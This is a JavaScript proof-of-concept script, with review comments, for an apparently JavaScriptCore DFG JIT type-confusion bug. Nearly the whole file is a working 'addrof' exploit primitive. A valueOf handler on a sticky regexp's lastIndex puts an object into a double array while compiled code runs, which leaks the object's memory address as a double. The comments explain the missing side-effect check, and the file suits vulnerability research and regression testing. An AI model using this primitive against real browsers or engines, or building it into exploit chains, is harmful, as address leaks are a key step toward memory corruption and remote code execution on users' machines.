// addrof primitive:
// Leaks address of an arbitrary JSObject
//
// NOTE(review): this is a proof of concept for a JIT type-confusion bug
// (the comments below mention DFG, so presumably JavaScriptCore — the
// affected engine/version is not stated on this page). The defect being
// demonstrated is a missing side-effect check: the valueOf handler installed
// on regexp.lastIndex runs user code while the compiled InfoLeaker still
// trusts its earlier assumption that `a` holds only doubles, so the object
// stored into a[0] is read back as a raw double. A correct engine must drop
// that assumption (bail out) after any operation that can run user code.
function setupAddrof() {
  var arg = null;     // the array passed to InfoLeaker; written to by the valueOf handler below
  var leakme = null;  // the object whose address is leaked
  let regexp = /a/y;  // sticky flag: matching reads lastIndex, which is what runs the handler
  // Once compiled after the warm-up loop, the engine expects `a` to be a double array.
  function InfoLeaker(a) {
    regexp[Symbol.match](""); // This will invoke 'regexp.lastIndex.toString()'
                              // (the handler actually installed below is valueOf)
    return a[0];
  }
  // Force JIT compilation of the infoleak routine
  for (var i = 0; i < 100000; i++) {
    InfoLeaker([1.1, 2.2, 3.3]);
  }
  // Installing an handler on 'valueOf' or 'toString'
  // allows executing arbitrary code without DFG bailing-out
  regexp.lastIndex = {
    valueOf: () => {
      arg[0] = leakme;  // replaces a double with an object behind the compiled code's back
      return 0;
    }
  };
  // Returned closure: leaks `obj` by running InfoLeaker on a fresh double array
  // that the handler mutates mid-call.
  return function(obj) {
    leakme = obj;
    arg = [1.1, 2.2, 3.3];
    return InfoLeaker(arg);
  };
}
// Runs the addrof primitive once and reports whether the engine was affected.
// `print` is not a browser builtin; presumably the engine's shell — confirm.
function trigger_infoleak() {
  let addrOfOnce = setupAddrof();
  // Arbitrary object to leak address of
  var leakme = {};
  // This is an address, but it's represented as a double
  let leakmeAddr = addrOfOnce(leakme);
  // Negative result: 1.1 means the handler's store was never observed; an
  // "object" result means the engine correctly noticed the store and returned
  // the object itself. Either way the confusion did not occur (bug absent or mitigated).
  if (leakmeAddr == 1.1 || typeof leakmeAddr == "object") {
    print("[-] Could not trigger infoleak!");
    return;
  }
  print("[+] leakme @ " + leakmeAddr);
}
// Entry point: the check runs once when the script is loaded.
trigger_infoleak();